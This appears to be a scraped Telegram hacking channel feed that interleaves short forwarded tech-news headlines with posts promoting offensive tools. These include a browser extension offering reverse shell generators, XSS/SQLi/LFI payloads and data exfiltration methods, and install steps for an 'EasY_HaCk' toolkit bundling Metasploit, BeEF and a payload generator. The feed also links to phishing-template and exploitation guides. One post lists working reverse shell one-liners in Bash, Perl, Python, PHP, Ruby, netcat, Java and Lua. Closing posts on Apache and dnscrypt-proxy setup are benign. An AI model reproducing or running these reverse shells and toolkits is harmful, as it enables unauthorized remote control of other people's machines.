UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.7K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Forwarded from UNDERCODE NEWS
Operators of Revil ransomware threaten to upload photographs pertaining to cosmetic surgery.
#Malwares
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ALL FREE :

Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat)

Shell Spawning (TTY Shell Spawning)

XSS Payloads

Basic SQLi payloads

Local file inclusion payloads (LFI)

Base64 Encoder / Decoder

Hash Generator (MD5, SHA1, SHA256, SHA512, SM3)

Useful Linux commands (Port Forwarding, SUID)

RSS Feed (Exploit DB, Cisco Security Advisories, CXSECURITY)

CVE Search Engine

Various method of data exfiltration and download from a remote
machine

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) install this extension in your browser: https://addons.mozilla.org/en-US/firefox/addon/hacktools/

2) switch on from extension manager

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Call Center: scams that affect their victims randomly.
#International
Forwarded from UNDERCODE NEWS
90% of Christmas Day-activated smartphones are iPhones.
#Analytiques
Forwarded from UNDERCODE NEWS
Financial institutions hurry to respond to the alarm of the FSA and illegal access to goods from the sales force.
#International
Forwarded from UNDERCODE NEWS
2,5 million details for mobile consumers distributed by the Italian mobile operator.
#International
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘{1}-Payload Generator

{2}- Merasploit-Framework installation

{3} Beef-Framework installation

{4} NGROK installation

{5} Network scanning using nmap

{6} WEB-HACKS

{7} PASSWORD CRACK

{8} Starting your web server

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) pkg update

2) pkg upgrade

3) pkg install git

4) git clone https://github.com/sabri-zaki/EasY_HaCk

5) cd EasY_HaCk/

6) chmod +x install.sh

7) Type EasY-HaCk

8) choose option
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Two sizes can be given at the same time by AirPods Pro 2.
#Technologies
Forwarded from UNDERCODE NEWS
The leaker revealed new information that would be announced in 20222 for the foldable iPhone.
#Technologies
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

hacking is fun with this collections :
-EMAIL RECONNAISSANCE AND PHISHING TEMPLATE GENERATION MADE SIMPLE:

www.cybersyndicates.com/.../email-reconnaissance-phishing-template-generation-made-simple

-Comprehensive Guide on Gobuster Tool:

https://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/

--My Top 5 Web Hacking Tools:

https://medium.com/p/e15b3c1f21e8

-90-[technical] Pen-testing resources:

https://medium.com/p/cd01de9036ad

-File System Access on Webserver using Sqlmap:

http://www.hackingarticles.in/file-system-access-on-webserver-using-sqlmap

-kali-linux-cheatsheet:

https://github.com/NoorQureshi/kali-linux-cheatsheet

-Pentesting Cheatsheet:

https://anhtai.me/pentesting-cheatsheet/

-Command Injection Exploitation through Sqlmap in DVWA (OS-cmd):

http://www.hackingarticles.in/command-injection-exploitation-through-sqlmap-in-dvwa

-XSS Payload List - Cross Site Scripting Vulnerability Payload List:

https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html

-Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection:

https://www.notsosecure.com/analyzing-cve-2018-6376/

-Exploiting Sql Injection with Nmap and Sqlmap:

http://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap

--awesome-malware-analysis:

https://github.com/rshipp/awesome-malware-analysis

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
1Mobile strives to boost the audio quality of calls.
#Updates
Forwarded from UNDERCODE NEWS
WhatsApp: It will stop working on certain smartphones from next year.
#Updates
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

Reverse shell method for multiple programming languages ​​under Linux l:

Bash command: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl version: perl -e'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p ,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i" );};

Python version: python -c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s. fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i "]);'

PHP version: php -r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby version: ruby ​​-rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d" ,f,f,f)'

nc version: nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp /f
nc xxxx 8888|/bin/sh|nc xxxx 9999

java version: r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Lua version: lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/ bin/sh -i <&3 >&3 2>&3');"

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
The AdDuplex study reveals that the Windows 10 20H2 edition utilization rate approaches 10%
#Analytiques
Forwarded from UNDERCODE NEWS
Microsoft changes the launch menu and registry editor on Windows 10.
#Updates
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Launch a simple service via apache :

C.D.Luminate
https://github.com/cdluminate/withlinux

---START---

1. install apache2
sudo apt install apache2
then apache2 will autostart and set to start after boot.
sysv-rc-conf, or systemctl disable ... etc.

2. configure
cd /etc/apache2

apache2.conf -> the main configure file.
`--ports.conf -> conf about ports.


consider to,
at port 8080, serve a file server rooted at /some/dir
-> default is /var/www for debian.

2.1 [optional] config apache2.conf
add this , or Include a file contained it, such as mysrvdir.conf
<Directory /some/dir>
Options None
AllowOverride None
Require all granted
</Directory>

add ServerName such as
> ServerName localhost

2.2 config ports.conf
add
Listen 8080
or sth like
Listen [IPv6_addr]:8080
Listen 192.168.0.1:8080 -> to bind a ip addr
Listen *:8080 -> wildcard is supported
and comment other ports.

2.3 add a file to sites-enabled/
file contents
<VirtualHost *:8080>

ServerAdmin root@localhost
DocumentRoot /some/dir

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>


3. bind mount
mount --bind /dir/of/files/to/serve /some/dir

4. start apache
apachectl start
ref: apach.org
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Loss of automobile control inductor by Panasonic halves.
#Technologies
Forwarded from UNDERCODE NEWS
A bug in Microsoft Teams causes concerns for several users.
#Bugs
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘MORE SECURITY AND ANONIMITY :

πŸ›‘ How to install dnscrypt proxy with ad blocker on Linux ??

COPY AND PASTE COMMANDS TO YOUR TERM:
Run the command according to your Linux distribution as root user:

A)
Debian / Ubuntu users use apt / apt-get ##

$ sudo apt install dnscrypt-proxy


## Alpine Linux users use apk ##

$ sudo apk add dnscrypt-proxy

## CentOS / RHEL users:

## Add EPEL repository on CentOS 8 or RHEL 8

## use yum ##

$ sudo yum install dnscrypt-proxy

## Arch Linux use pacman ##

$ sudo pacman -S dnscrypt-proxy

## OpenSUSE / SUSE Linux users use zypper ##

$ sudo zypper in dnscrypt-proxy

## Fedora users use dnf ##

$ sudo dnf install dnscrypt-proxY

B)

Dnscrypt proxy configuration
Edit dnscrypt-proxy.toml in the / etc / dnscrypt-proxy / directory.

For example:



$ ls -l /etc/dnscrypt-proxy/
$ sudo vim /etc/dnscrypt-proxy/dnscrypt-proxy.toml

First, we need to set up a list of used servers.
Let's use both Google and Cloudflare:
server_names = [ 'google' 'cloudflare']
I can use cloudflare too:
server_names = [ 'cloudflare']
Configure the list of listening local addresses and ports:
listen_addresses = ['127.0.0.1:53', '[::1]:53']
For my VPN 172.168.0.0/24:

listen_addresses = ['127.0.0.1:53', '172.168.0.1:53' ]
If you have an IPv6 connection, use the servers available over IPv6 (IPv4 by default):
ipv6_servers = true
Make sure we are using servers that implement DNSCrypt and DoH protocol.
dnscrypt_servers = true
doh_servers = true
Make sure we enable DNS cache to reduce latency and outbound traffic:
cache = true
The server must support DNS Security Extensions (DNSSEC):
require_dnssec = true
Adblock lists consist of one template per line.
Examples of valid patterns:
##
## example.com
## =example.com
## ads.*
## ads*.example.*
## ads*.example[0-9]*.com
Blocking rules file path:
blacklist_file = '/etc/dnscrypt-proxy/blacklist.txt'
Save and close the file.
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁